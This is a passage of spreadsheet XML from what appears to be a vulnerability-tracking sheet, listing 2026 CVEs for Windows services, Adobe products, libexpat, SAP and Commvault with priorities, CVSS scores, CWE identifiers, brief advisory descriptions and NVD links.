          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7476</t>
        </is>
      </c>
      <c r="D944" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F944" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr"/>
      <c r="Q944" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R944"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S944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7477</t>
        </is>
      </c>
      <c r="D945" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F945" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr"/>
      <c r="Q945" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R945"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S945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75631</t>
        </is>
      </c>
      <c r="D946" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F946" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr"/>
      <c r="Q946" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R946" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="D947" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F947" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr"/>
      <c r="Q947" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R947"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S947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="D948" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F948" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr"/>
      <c r="Q948" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R948"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S948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="D949" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F949" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr"/>
      <c r="Q949" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R94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S949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75992</t>
        </is>
      </c>
      <c r="D950" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F950" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr"/>
      <c r="L950" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr"/>
      <c r="Q950" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R950" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76957</t>
        </is>
      </c>
      <c r="D951" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr">
        <is>
          <t>libexpat_project:libexpat</t>
        </is>
      </c>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr"/>
      <c r="Q951" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R951" s="5" t="inlineStr">
        <is>
          <t>libexpat before 2.8.4 lacks handler call depth tracking with custom encoding callbacks. Thus, a use-after-free can occur. NOTE: this is similar to CVE-2026-50219, CVE-2026-56131 and CVE-2026-56412.</t>
        </is>
      </c>
      <c r="S951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76957</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="D952" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F952" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr"/>
      <c r="Q952" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R952"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S952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="D953" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr"/>
      <c r="Q953" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R953" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="S953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D954" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F954" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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54" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr"/>
      <c r="Q954" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R954" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D955" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F955" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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55" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr"/>
      <c r="Q955" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="R955" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="D956" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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6" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr"/>
      <c r="Q956" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R956" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D957" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F957" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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7" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr"/>
      <c r="Q957" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R957" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="D958" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F958" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K95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58" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr"/>
      <c r="Q958" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R958" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="D959" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F959" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K95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959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr"/>
      <c r="Q959" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R959" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79907</t>
        </is>
      </c>
      <c r="D960" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F960" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr"/>
      <c r="Q960" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R960" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79908</t>
        </is>
      </c>
      <c r="D961" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F961" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr"/>
      <c r="Q961" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R961" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79909</t>
        </is>
      </c>
      <c r="D962" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F962" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
